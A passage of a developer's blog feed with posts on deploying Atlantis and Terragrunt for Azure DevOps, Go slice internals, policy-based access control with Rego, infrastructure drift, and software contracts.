ARG TERRAGRUNT_VERSION=&quot;v0.23.2&quot;
RUN curl -L -o /usr/local/bin/terragrunt https://github.com/gruntwork-io/terragrunt/releases/download/${TERRAGRUNT_VERSION}/terragrunt_linux_amd64 \
  &amp;&amp; chmod +x /usr/local/bin/terragrunt
  
# Copy plugins
COPY .terraformrc /root/.terraformrc
COPY --chown=atlantis:atlantis --from=builder /go/tmp /home/atlantis/.atlantis/plugin-cache
RUN mv /home/atlantis/.atlantis/plugin-cache/terraform /usr/local/bin/terraform

# Configure git
COPY .gitconfig /home/atlantis/.gitconfig
COPY azure-devops-helper.sh /home/atlantis/azure-devops-helper.sh

# Copy server-side repository config
COPY repository-config.yaml /home/atlantis/repository-config.yaml

CMD [&quot;server&quot;, &quot;--repo-config=/home/atlantis/repository-config.yaml&quot;]

LABEL org.opencontainers.image.title=&quot;Atlantis Environment&quot;
LABEL org.opencontainers.image.description=&quot;An environment to support executing Terragrunt operations with Atlantis&quot;

LABEL binary.atlantis.version=&quot;v0.11.1&quot;
LABEL binary.terragrunt.version=${TERRAGRUNT_VERSION}
LABEL binary.azure-cli.version=${AZURE_CLI_VERSION}
</code></pre>
<p>Our <code>Dockerfile</code> not only contains Atlantis, but:</p>
<ul>
<li>Terragrunt for DRY infrastructure code.</li>
<li>The Azure CLI to be able to provision and manage Azure resources.</li>
<li><a href="https://github.com/hashicorp/terraform/tree/master/tools/terraform-bundle">Terraform Bundle</a> to explicitly configure which plugins are pre-installed.</li>
</ul>
<pre><code class="language-hcl"># The version of Terraform to include with the bundle.
terraform {
  version = &quot;0.12.21&quot;
}

# The providers to pre-download and include in the Atlantis image.
providers {
  azurerm     = [&quot;~&gt; 2.0.0&quot;]
  azuread     = [&quot;~&gt; 0.7.0&quot;]
  random      = [&quot;~&gt; 2.2.0&quot;]
  local       = [&quot;~&gt; 1.4.0&quot;]
}
</code></pre>
<p>.. as well as small helper script to assist with authorization to Azure DevOps.</p>
<p>While Atlantis <em>does</em> have a <code>--write-git-creds</code> flag which will write out a <code>.git-credentials</code> file and configure the <code>git</code> client within the Docker image. We found that at the time of our implementation (and writing this post), it always assumed an <code>ssh</code> connection.</p>
<p>In other words if, like us, you reference your Terraform modules via <code>https</code>:</p>
<pre><code class="language-hcl">module &quot;foo&quot; {
  source = &quot;git::https://org@dev.azure.com/org/project/_git/modules//foo?ref=0.1.0&quot;
}
</code></pre>
<p>Atlantis won't be able to pull your private module repositories within Azure DevOps.</p>
<p>To work around this, we implemented a <a href="https://git-scm.com/docs/gitcredentials">git credential helper</a> that sets the git username and password to the credentials that have already passed into the environment.</p>
<p>The helper:</p>
<pre><code class="language-bash">[credential &quot;https://dev.azure.com&quot;]
	helper = &quot;/bin/sh /home/atlantis/azure-devops-helper.sh&quot;
</code></pre>
<p>The script itself:</p>
<pre><code class="language-bash">#!/bin/sh 

# These values are already provided to the container from
# the Kubernetes manifest.
echo username=$ATLANTIS_AZUREDEVOPS_WEBHOOK_USER
echo password=$ATLANTIS_AZUREDEVOPS_TOKEN
</code></pre>
<p>While the above <code>Dockerfile</code> may be more than you need, at a minimum you'll need the Azure CLI if you intend on managing Azure resources.</p>
<h3 id="4applythemanifeststokubernetes">4. Apply the manifests to Kubernetes</h3>
<p>Many of our workloads already run on Kubernetes, so it seemed like the most reasonable choice for Atlantis as well. Better yet, the Atlantis team already provides the Kubernetes manifests, as well as examples on how to configure them. Both a Deployment and StatefulSet example are included <a href="https://www.runatlantis.io/docs/deployment.html#statefulset-manifest">here</a>.</p>
<p>We ended up choosing the StatefulSet approach, but your requirements may be different. The biggest factor to consider when choosing between the two approaches is that a Deployment won't persist the locks on your repositories if the pod is restarted, whereas a StatefulSet will. This is because Atlantis stores all of its data (e.g. locks, plugins) in its <code>data directory</code>. When using a Deployment resource, this will just be a folder within the container, which has no guarantees to persist if the pod is restarted. On the other hand, a StatefulSet will use a Persistent Volume Claim which allowis the locks to persist, even through a restart.</p>
<p>Regardless of your choice, all that needs to be done is to find the <code>Azure DevOps Config</code> section in the provided example manifests and replace the placeholder values with the credentials that were created in the previous step.</p>
<h3 id="5configurethewebhooks">5. Configure the webhooks</h3>
<p>At this point, we had:</p>
<ul>
<li>A user to clone repositories and comment on pull requests with the proper access.</li>
<li>A Dockerfile with the tools needed to complete our workflows.</li>
<li>The Atlantis manifests applied to our Kubernetes cluster.</li>
</ul>
<p>The last major step in getting up and running with Atlantis, was to add the webhooks that would respond to events within our repository.</p>
<p>Similar to the Kubernetes manifests, Atlantis provides great <a href="https://www.runatlantis.io/docs/configuring-webhooks.html#azure-devops">documentation</a> on how to configure these for Azure DevOps.</p>
<p>We just followed the steps, tested the connection, and began using Atlantis to review and deploy our infrastructure changes!</p>
<h2 id="returningtothesurface">Returning to the surface</h2>
<p>Our journey to Atlantis was long, but we intend to vacation here for quite a while.</p>
<p>Teams can now create custom infrastructure workflows that make sense for them, and we now have a central authority for all infrastructure changes. Better yet, it allowed us to retire our legacy workflows, and adopt an open source solution with a great community behind it.</p>
<p>Special thanks to <a href="https://twitter.com/mcdafydd">@mcdafydd</a> for adding the Azure DevOps integration to Atlantis.</p>
]]></content:encoded></item><item><title><![CDATA[Go Slices Demystified]]></title><description><![CDATA[<p>Slices are one of those types in Go that take a little bit of time and hands on experience to really wrap your head around. There is a lot of material out there that explain slices, but I'm going to take a slightly different approach. We'll start with clarifying some</p>]]></description><link>https://reese.dev/go-slices-demystified/</link><guid isPermaLink="false">5d52c12518b2660ace8d0de5</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Mon, 14 Oct 2019 18:40:00 GMT</pubDate><content:encoded><![CDATA[<p>Slices are one of those types in Go that take a little bit of time and hands on experience to really wrap your head around. There is a lot of material out there that explain slices, but I'm going to take a slightly different approach. We'll start with clarifying some potential misconceptions with the mechanics of slices, and prove out their implementation with executable Go code.</p>
<h2 id="slicesarevaluetypes">Slices are value types</h2>
<p>In practice, while it may appear that slices are <a href="https://dave.cheney.net/2017/04/29/there-is-no-pass-by-reference-in-go">pointer types</a>, in actuality they are value types.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
	&quot;unsafe&quot;
)

func main() {
	var s []int
	var p uintptr

	fmt.Printf(&quot;slice: %v | pointer: %v&quot;, unsafe.Sizeof(s), unsafe.Sizeof(p))
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
slice: 24 | pointer: 8
</code></pre>
<p>A <code>uintptr</code>, at least on the host machine, is 8 bytes. The slice, <code>[]int</code> is <em>three</em> times the size, 24 bytes.</p>
<p>This is due to the fact that a slice is a <em>value</em> type, specifically a <code>struct</code>, that contains <em>three</em> fields: Data, Len, and Cap.</p>
<p><em>See the <a href="https://golang.org/pkg/reflect/#SliceHeader">SliceHeader</a> documentation in the reflect package for more information. Alternatively, you can look at <a href="https://golang.org/src/runtime/slice.go">slice.go</a> from the Go runtime.</em></p>
<p>This means that when you pass a slice from one function to another, you are copying an entire <code>struct</code>, not just a pointer.</p>
<p>As a bonus, since the <code>map</code> type often gets lumped into the same category as slices when talking about pointer types, a <code>map</code> in Go actually <em>is</em> a pointer type.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
	&quot;unsafe&quot;
)

func main() {
  var m map[int]int
  var p uintptr
  
  fmt.Printf(&quot;map: %v | pointer: %v&quot;, unsafe.Sizeof(m), unsafe.Sizeof(p))
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
map: 8 | pointer: 8
</code></pre>
<h2 id="slicespointtoarrays">Slices point to arrays</h2>
<p>You'll notice that when it comes to growing in size, the behavior of a slice is what you would expect from an array. Hopefully you remember your lectures from data structures!</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
)

func main() {
	nums := []int{1}
    
	// NOTE: &amp;nums[0] is used here to show the address of 
    // the first element in the array.
    //
    // This is because the variable `nums` (no indexer) references 
    // the struct of the slice.
    //
	// If the address of nums[0] changes, we know that the array that the 
	// slice points to has changed.
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 2)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 3)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 4)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 5)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc00004a1f0
len 2 | cap 2 | addr 0xc0000044a0
len 3 | cap 4 | addr 0xc0000200c0
len 4 | cap 4 | addr 0xc0000200c0
len 5 | cap 8 | addr 0xc00009a000
</code></pre>
<p>From the execution above, we can see that the initial creation of the slice sets both the capacity and length to 1.</p>
<p>When we perform an <code>append()</code> operation to add another value to the slice, we see that the capacity and length are incremented to 2.</p>
<p>You'll notice, however, that the address changed after the append. This is because the underlying array reached capacity. In order to be able to store the newly appended value, the slice needs to reference a new, larger array.</p>
<p>To accomplish this, Go will:</p>
<ul>
<li>Create a new array that is double the capacity of the original array</li>
<li>Populate the newly created array with the original values</li>
<li>Update the pointer on the slice to point to the newly created array</li>
</ul>
<p>As shown above, we can see all of these changes because append returns the slice with the new capacity and length values (and potentially a new backing array if the original was at capacity).</p>
<p>In the scenario where the slice needs a new backing array, any references to the old array are still valid.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
)

func main() {
	nums := []int{1}

	// Create a copy of the slice that was declared above
	c := nums

	// Sanity check that all of the properties for both slices are identical
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(c), cap(c), &amp;c[0])

	// Since nums has a capacity of 1 and we are performing an append 
	// operation, the backing array will need to be replaced with 
	// a larger array
	nums = append(nums, 2)

	// After completing the append operation, nums has a new backing array
	// Note however that newslice still references the old array
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(c), cap(c), &amp;c[0])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc0000120d0
len 1 | cap 1 | addr 0xc0000120d0
len 2 | cap 2 | addr 0xc000012120
len 1 | cap 1 | addr 0xc0000120d0
</code></pre>
<p>So if slices just reference arrays under the hood, and slices are a <em>slice</em> of an array. What happens if we don't look at the value that is returned from the append?</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
)

func main() {
	nums := []int{1}
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 2)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 3)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	_ = append(nums, 4)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc00004c1e0
len 2 | cap 2 | addr 0xc00005a460
len 3 | cap 4 | addr 0xc000098000
len 3 | cap 4 | addr 0xc000098000
</code></pre>
<p>Everything stays the same! Which may not be shocking, but the interesting part is that the underlying array <em>did</em> change. And we can prove that.</p>
<pre><code class="language-go">package main

import (
	&quot;fmt&quot;
	&quot;reflect&quot;
	&quot;unsafe&quot;
)

func main() {
	nums := []int{1}
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 2)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	nums = append(nums, 3)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	// Call the append() function, but DO NOT update the slice 
	// to reflect the changes
	_ = append(nums, 4)
	fmt.Printf(&quot;len %v | cap %v | addr %p\n&quot;, len(nums), cap(nums), &amp;nums[0])

	// At this point, we already know myslice was unchanged.
	// However, its possible to see the appended value.

	// 1. Get the slice header of myslice (struct with .Data, .Len, and .Cap)
	sliceHeader := (*reflect.SliceHeader)(unsafe.Pointer(&amp;myslice))

	// 2. Using the .Data field in the slice header
	// cast it into a pointer to an array of ints (its actual type).
	array := (*[4]int)(unsafe.Pointer(sliceHeader.Data))

	// REMEMBER: The .Data field in the slice header is the underlying array!
	fmt.Printf(&quot;nums len: %v | nums cap: %v\n&quot;, len(nums), cap(nums))
	fmt.Printf(&quot;last element in the array is: %v&quot;, array[3])
}
</code></pre>
<pre><code class="language-shell-session">$ go run main.go
len 1 | cap 1 | addr 0xc0000361f0
len 2 | cap 2 | addr 0xc0000044c0
len 3 | cap 4 | addr 0xc000040080
len 3 | cap 4 | addr 0xc000040080
nums len: 3 | nums cap: 4
last element in the array is: 4
</code></pre>
<p>You can see from the output that the while the slice has length 3, we referenced the 4th element in the array (at index 3), and got the last value we appended. <strong>The slice remained unchanged</strong>, but the underlying array was updated to contain the appended value.</p>
<p><em>It is worth mentioning that this is a contrived example to showcase some of the internals, and isn't something you'd really see in production code.</em></p>
<p>In reality, you would just increase the size of the slice so that you were able to interact with more elements in the array. In other words, what the <code>append</code> operation is doing for you when you get its return value.</p>
<pre><code class="language-go">// nums has a length of 3, so this line 
// would panic with an out of bounds error
fmt.Println(nums[3]) // panic: out of bounds

// Recall, however, that the array itself is still 
// of length 4 and the last appended value is 4

// We can increase the length of nums which lets us 
// access more of the underlying array. 
// This returns a slice with a size and capacity of 4.
nums = nums[:4]

fmt.Println(nums[3]) // prints 4

// NOTE: [:4] means allow the slice to see the 
// 0th index of the underlying array 
// up until the 3rd index.
</code></pre>
<p>TL;DR.. I just want to regurgitate stuff</p>
<ol>
<li>Slices are value types. They are not pointers</li>
<li>The slice type is a <code>struct</code> which has three private fields: <code>array</code>, <code>len</code>, and <code>cap</code></li>
<li>Slices control what you can and cannot access in its backing array. It's possible to access more of the array by increasing the slice's <code>len</code> property via the <code>append</code> function</li>
<li>Slices hold a reference to an array, so it's possible that multiple slices reference the same array</li>
</ol>
<p></p>]]></content:encoded></item><item><title><![CDATA[Policing Through Policy]]></title><description><![CDATA[<p>Driving is one of those freedom's that we sometimes take for granted. Life would be quite different without the luxuries that a vehicle affords us. Unfortunately, driving is not without its dangers. Distracted driving can lead to collisions, cars can break down unexpectedly, and accidents are inevitable. We're only human.</p>]]></description><link>https://reese.dev/policing-through-policy/</link><guid isPermaLink="false">5d13c00418b2660ace8d0ddd</guid><category><![CDATA[security]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 16 Aug 2019 14:02:45 GMT</pubDate><content:encoded><![CDATA[<p>Driving is one of those freedom's that we sometimes take for granted. Life would be quite different without the luxuries that a vehicle affords us. Unfortunately, driving is not without its dangers. Distracted driving can lead to collisions, cars can break down unexpectedly, and accidents are inevitable. We're only human.</p><p>While it would be nice to have an expert driver for every person who needs to get to their destination, it's not a scalable solution. Each person has their own specific timeline and destination. </p><p>Our solution as a society, then, is to give each person the ability to handle their own transportation. You take a driver's test to prove that you have a fundamental understanding of the rules of the road and have the ability to actually drive the vehicle. If you pass, you are granted the privileged to join the open road with millions of other human beings. While it sounds like chaos, and honestly it sometimes is, how do we seemingly manage to pull it off day in and day out?</p><p>The answer is <em>policies</em>.</p><p>To keep drivers from getting distracted while on the road, we've enacted distracted driver policies. These policies include rules that prohibit drivers from using a cellphone while on the road, and bar the use of earbuds when the car is in motion.</p><p>We have policies around safety that state that cars must abide by all traffic signs which tell us when we should stop, and how fast we can go. </p><p>The key of this approach to enforcement is that it is generic and focuses on what the policy ultimately sets out to do. It doesn't matter if you're driving a Ford, a Chevy, or a Dodge, you're beholden to the same policies as everyone else.</p><p>So what's the point of all of this? The same philosophy can be applied within an organization! When policies are enforced within an organization, employees are more empowered to complete their tasks on their own, but are still kept in check by the policies that have been put in place.</p><p>You may be thinking, how does a policy differ from permissions?</p><p>Permissions for the most part, are relatively easy to wrap our heads around. You either have a permission, or you do not. If you do not have permission perform an action, well, you can't perform that action. This approach is unwavering and not flexible as there are many other aspects that should be considered when someone can or cannot do something.</p><p>If you add in roles, we can now reason about what sorts of permissions someone should have given their role in the company. Truthfully, for small systems, this could be completely acceptable. Where roles and permissions fall down, is when you consider larger systems, especially with multi-tenancy. </p><p>Let's consider the driving scenario again in the context of the USA. </p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/08/image.png" class="kg-image"></figure><div align="center">'murica</div><p>The United States would be an organization, and the states would be tenants. In this context, it wouldn't be far fetched to have a "allowed to drive" permission per state. Immediately we've introduced 50 permissions, per user, into our system. Not only is that a lot of permissions, we'd be going about securing the roads in the wrong way. </p><p>As an organization, we don't necessarily care whether or not you can drive in a specific state. We have driving laws that are applicable everywhere, and really, as long as you abide by them that's all we should care about. This approach gives us an immense amount of flexibility. It would be crazy to have to pass a drivers test for every state you wanted to drive in! So why do we do it in software systems?</p><p>The scenario described above, associating a role (or permission) with every specific use case is commonly referred to as <em>role explosion</em>. So what's the alternative? </p><h2 id="attribute-based-access-control">Attribute-based Access Control</h2><p>The key difference between ABAC and a role-based permission model is that ABAC considers the <em>context </em>when an authorization request is made. Remember roles and permissions are binary, you can perform the action, or you cannot. Our rules and regulations around driving is a pretty good example of attribute-based access control.</p><p>For example, lets say when you pass your driver's test you are added to the Driver role. Then when you're on the road you're constantly being validated by policy checks. Are you going the speed limit? Are you on the correct side of the road? As you drive, we have that context, and the policy engine (police officer) can determine if you are violating the policies that the United States have set for all of its tenants.</p><p>If not already obvious, it is worth pointing out that in this scenario we did still use a role. Attribute-based access control can actually use roles as part of its decision making process!</p><p>Leveraging policies instead of fine grained permissions gives us a lot of flexibility and lets us focus on what we actually care about. Whereas permission models are often far too restrictive and ignore the context in which the action is being performed in.</p><p>Now, we're all well versed in checking specific permissions and roles. One little if() statement can give you a yes or no answer to whether or not the action can be performed. But what does validating a policy actually look like?</p><h2 id="policy-validation-with-rego-and-opa">Policy Validation with Rego and OPA</h2><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/08/image-1.png" class="kg-image"></figure><p>I won't dive too deep into Rego as that could be a post in itself, but it is worth introducing Rego as a solution to policy validation for familiarity.</p><p><a href="https://www.openpolicyagent.org/docs/v0.10.7/how-do-i-write-policies/">Rego </a>is a policy language drives <a href="https://www.openpolicyagent.org/">Open Policy Agent</a> policies. Keeping with the driving theme, an example distracted driving policy would be:</p><pre><code>In order to reduce the risks associated with distracted driving, certain conduct is prohibited while driving a company-owned motor vehicle or while driving a personal vehicle while on company business, including: 

• Using cell phones (including hands-free) 
• Operating laptops, tablets, portable media devices, and GPS devices 
• Reading maps or any type of document, printed or electronic
</code></pre>
<p><sup><em>Taken from <a href="https://emcins.com">https://emcins.com</a></em></sup></p>
<p>This policy, represented in Rego, might look something like the following:</p><pre><code class="language-javascript">package distracted

disallowed_conduct = [
    &quot;USING_PHONE&quot;,
    &quot;OPERATING_MEDIA_DEVICE&quot;,
    &quot;READING_DOCUMENT&quot;
]

deny[msg] {
  input.vehicle.status = &quot;IN_MOTION&quot;
  input.driver.conduct = disallowed_conduct[_]
  
  msg = sprintf(&quot;invalid conduct: %v&quot;, input.driver.conduct)
}
</code></pre>
<p>In this Rego policy, all of the conditions must be met in order for the policy agent to return a <code>deny</code> result for the authorization request.</p><p>If the vehicle has a status of IN_MOTION and the operator's conduct is in the disallowed list, we set the msg stating that they are in violation of the policy.</p><p>We'd also probably have another policy somewhere, outside of the distracted driving policy, that checks to make sure the operator has the <code>Driver</code> role:</p><pre><code class="language-javascript">package global

deny[msg] {
  not input.operator.role = &quot;Driver&quot;
  msg = sprintf(&quot;Operator must be in the %v role&quot;, input.operator.role)
}
</code></pre>
<p>Rego input is the JSON we all know and love, so an authorization request in this context could be:</p><pre><code class="language-json">{
  &quot;operator&quot;: {
    &quot;role&quot;: &quot;Driver&quot;,
    &quot;conduct&quot;: &quot;USING_PHONE&quot;
  },
  &quot;vehicle&quot;: {
    &quot;status&quot;: &quot;IN_MOTION&quot;
  }
}
</code></pre>
<p>The power of this approach is that because it is so flexible, you can validate policy against almost any data set as long as it has some structure to it. </p><ul><li>You can validate that a <code>Dockerfile</code> only uses <code>FROM</code> on blessed images.</li><li>You can validate that a <code>.tf</code> file from Terraform only uses specific providers.</li><li>You can validate that a Kubernetes manifest contains specific label(s).</li></ul><p>.. just to name a few of the possibilities.</p><p>Because when you really think about it, these are the things we really care about. We don't necessarily care about a permission, we grant permission because we trust someone to perform an action, because we trust they will enforce the policy.</p><p>Here we can just define the policy outright and let anyone* make changes, because we know the policy will always be enforced.</p><p>Like everything else in software and in life, it's not a silver bullet. You're still going to use roles and permissions to some degree, and you can't have policies around <em>everything. </em>It simply opens doors to additional approaches to automation via automatic approvals, and explicitly defines what our policies are in code.</p><p>If you're interested in seeing some more examples of what types of files you can validate, and what those policies might look like, you can checkout the examples folder for conftest which can be found here: <a href="https://github.com/instrumenta/conftest/tree/master/examples">https://github.com/instrumenta/conftest/tree/master/examples</a></p><p>I do help maintain the project so if you do decide to explore it, I'd love to hear your feedback to help make it better.</p><p></p>]]></content:encoded></item><item><title><![CDATA[Drifting Into Failure]]></title><description><![CDATA[<p>Drifting into failure. It's one of my favorite ways to explain how the problems we face in our day to day, became problems in the first place.</p><p>You may have heard of <em><em>drifting into failure</em></em> before. Sidney Dekker published an entire book around the idea, aptly named <a href="https://cloudcity.plex.com/external-link.jspa?url=https%3A%2F%2Fwww.goodreads.com%2Fbook%2Fshow%2F10258783-drift-into-failure" rel="nofollow">Drift into Failure</a></p>]]></description><link>https://reese.dev/drifting-into-failure/</link><guid isPermaLink="false">5cf7cfe518b2660ace8d0dd0</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Mon, 10 Jun 2019 22:17:45 GMT</pubDate><content:encoded><![CDATA[<p>Drifting into failure. It's one of my favorite ways to explain how the problems we face in our day to day, became problems in the first place.</p><p>You may have heard of <em><em>drifting into failure</em></em> before. Sidney Dekker published an entire book around the idea, aptly named <a href="https://cloudcity.plex.com/external-link.jspa?url=https%3A%2F%2Fwww.goodreads.com%2Fbook%2Fshow%2F10258783-drift-into-failure" rel="nofollow">Drift into Failure</a>. He presents it as the idea that every small problem we ignore (or cover up), gets us closer to failure. What is a problem? What is a failure? That's one of the great things about keeping the idea abstract. It really lets you fill in the blanks and make up your own definitions.</p><p>Miss an oil change? Not the end of the world. Keep on putting it off week after week, month after month? Eventually it's going to catch up to you.</p><p>Deadlines pushing you to implement a less than ideal solution? Again, probably not the end of the world, but if you keep implementing those less than ideal solutions, you're going to eventually end up with a mess.</p><p>You get the picture. The idea here is that failures aren't often born from a single event, but the culmination of a lot of little events that didn't necessarily mean much on their own. We take little shortcuts here and there, but in the end, they will catch up to us in a potentially catastrophic way.</p><p>In the context of this post, I want to continue using this idea of drifting into failure, but speak specifically to how it applies to <strong><strong>infrastructure</strong></strong>.</p><p>To begin, you should be aware that there exists an approach to defining infrastructure using <strong><strong>code</strong></strong>. This is called IaC or Infrastructure as Code. It's a <em><em>contract </em></em>that says, make my infrastructure look exactly like this. </p><p>One alternative to Infrastructure as Code, is having someone on an operations team make ad hoc changes to the infrastructure. They would be notified that the infrastructure needs to change, so they would login and run some commands.</p><p></p><blockquote><em><em>NOTE: Unfamiliar with the idea of contracts? You can read all about what they are and their benefits in <a href="https://reese.dev/locked-into-a-contract-lucky-you">Locked into a Contract? Lucky You!</a></em></em></blockquote><p></p><p>These are two very different styles of managing the infrastructure. One is an <em><em>imperative</em></em> approach, and the other is a <em><em>declarative</em></em> approach. These are two very important concepts, so it's worthwhile explaining them.</p><h2 id="imperative-and-declarative-approaches">Imperative and declarative approaches</h2><p>For me, one of the easiest ways to reason about both of these approaches is that <strong><strong>declarative</strong></strong> focuses on the <em><em>what </em></em>and <strong><strong>imperative</strong></strong> focuses on the <em><em>how. </em></em></p><p>If I wanted you to come to my office, I could say in a declarative way "Come to my office". I don't care how you get here, but my desired state is that you are in my office. Alternatively, I could say in an imperative way, "Leave your office. Go to the elevator. Take the elevator to the 14th floor. Walk into my office".</p><p>The end result is the same in both scenarios, but the declarative approach gives you the freedom to do it however you choose to get it done.</p><p>It's also important to note that <strong><strong>declarative approaches often result in a series of imperative statements</strong></strong>. To make that a little more clear, lets continue with the above example. I told you to come to my office, in a declarative manner. But that doesn't mean you just magically teleport in front of me. I made clear what I wanted the end result to be, but I left it up to you to figure out the individual, imperative steps to get there.</p><p>Dockerfiles are a great representation of this, in my opinion. A Dockerfile is a series of imperative commands, but they get bundled up into some desired state. The act of using an image from a Dockerfile is declarative (I want exactly this), but the steps required to get there were imperative.</p><p>Another important aspect of declarative approaches, is <strong><strong>state</strong></strong>. In a declarative environment, we need to know what the current state of the infrastructure is. We also need the ability to figure out what needs to be done to get the infrastructure into that desired state. For example, if I tell some process to make my infrastructure look like X, and that process gets interrupted, it should be able to figure out whats remaining to get the infrastructure to look like X when it resumes.</p><p>Imperative does not allow for this, as it has no notion of state. While imperative approaches are simpler, the lack of state means that if the process is interrupted we have to start over again, because we don't know where we left off.</p><p>This is the power of being declarative and using contracts. They allow us to say exactly what we want the environment to look like with the contract, and leave all of the finer details up to the tooling that is fulfilling the contract.</p><h2 id="declarative-infrastructure">Declarative infrastructure</h2><p>You may have figured out by now that Infrastructure as Code is very much a declarative way of defining what your infrastructure should look like. There are a lot of benefits to leveraging Infrastructure as Code. To give you an idea, here are a few that really stand out for me:</p><h3 id="always-know-what-your-environment-looks-like">Always know what your environment looks like</h3><p>How many times have you wondered what version of .NET is on the build servers? What was your solution to finding out that information? Most likely it was to call up someone from the Ops team and have them tell you. Using Infrastructure as Code, the configuration of each environment is stored in source control, just like code. If you want to know some properties of an environment, you just need to go to the infrastructure repository and look for yourself.</p><h3 id="push-button-environments">Push button environments</h3><p>You'll most likely be hearing this phrase a lot in the days to come. The idea is that we should be able to define exactly what we want an environment to look like, and have some tooling do all of the work to fulfill our contract. Bringing this close to home, think about the time and effort it takes to stand up a new N. It takes a lot of people, a lot of time to make sure everything is just right.</p><p>The holy grail for push button environments is you do just that. You push a button, and after some time your environment will materialize before you. There shouldn't be any assumptions about where you are wanting to stand up your environment. Everything required to get that infrastructure up and running should be contained within the contract.</p><h3 id="testability">Testability</h3><p>When we talk about testing, our minds most likely go to testing to make sure our applications work. We have an environment we want to deploy to, and we need to run our unit, integration, &lt;noun&gt; tests to make sure that our application will work when deployed. But where did that environment come from? How can we be sure the environment is correct?</p><p>Because Infrastructure as Code is.. code (it's right there in the name!), it gives us the ability to run tests against the infrastructure before it is actually applied. Some tests might be verifying that the docker daemon is installed and running or that some registry values exist. The key here is that we can now test the environment that our applications will be deployed to.</p><h2 id="what-does-any-of-this-have-to-do-with-drift">What does any of this have to do with drift?</h2><p>Glad you asked! One of the key takeaways about contracts and Infrastructure as Code is that you cannot be allowed to make any change to the environment without updating the contract. Doing so, causes <em><em>drift</em></em>.</p><p>Environment drift occurs whenever someone changes the environment (applies a patch, adds some new registry value, etc) without updating the contract. The whole point of all of this is that we know exactly what the environment looks like, we can easily stand the environment up anywhere because everything about the environment is outlined in a contract, if the environment differs from the contract, then we lose those benefits. </p><p>When working with Infrastructure as Code, the same principles and processes we apply to deploying to applications, should also be applied to changes to our infrastructure. We don't just open up some source code on the production server, make a change, and apply it. The same rules and regulations should apply for our infrastructure.</p><p>If you want to make a change to the infrastructure, you must make a change to the contract and submit a pull request. If approved, that infrastructure will go through a series of tests, and will eventually be applied to the intended environment. How that change is applied could even mean we completely destroy the old environment and just stand up the result of the pull request.</p><p>Hooray immutability!</p><h1></h1><p></p>]]></content:encoded></item><item><title><![CDATA[Locked into a Contract? Lucky You!]]></title><description><![CDATA[<blockquote>Wait.. what? Contracts are horrible! I don't even know if I'm going to be using that service in the next few months, let alone years. I need <em><em>flexibility </em></em>so that as my requirements change I know I'm not going to be locked into something that no longer works for me.</blockquote>]]></description><link>https://reese.dev/locked-into-a-contract-lucky-you/</link><guid isPermaLink="false">5cdebce618b2660ace8d0dc3</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 17 May 2019 14:01:14 GMT</pubDate><content:encoded><![CDATA[<blockquote>Wait.. what? Contracts are horrible! I don't even know if I'm going to be using that service in the next few months, let alone years. I need <em><em>flexibility </em></em>so that as my requirements change I know I'm not going to be locked into something that no longer works for me.</blockquote><p>If you've ever had to sign a contract, you may be able to relate. They can be a pretty big deal. Both parties are explicitly agreeing to terms and conditions that cannot be violated, regardless of what may happen in the future. While contracts may feel like a burden in the real world, they are extremely powerful in software.</p><p>So what is a software contract? In practice, it doesn't differ that much from traditional contracts. It's an agreement between systems about what functionality is exposed, the data types of each message, the structure of the resource, etc. This allows us to forego a lot of manual validation that is typical when you're not exactly sure what's going to be sent on the wire or what the environment looks like.</p><h2 id="life-without-contracts">Life without Contracts</h2><p>Consider two independently deployed web services: PingService and PongService. When PingService sends a message to the PongService, the PongService should return a message, letting the PingService know the request was received.</p><p>Immediately we're in a state where there are more questions than answers. We know these services can talk over HTTP.. but that's about it.</p><ul><li>How do we structure the message to send to the PongService? Is it expecting JSON? XML?</li><li>What type of data should we send to the PongService? A Boolean? Integer?</li></ul><p>The answer that more than likely comes to mind is to.. look at the API documentation! Which, assuming it was kept up to date, should answer those 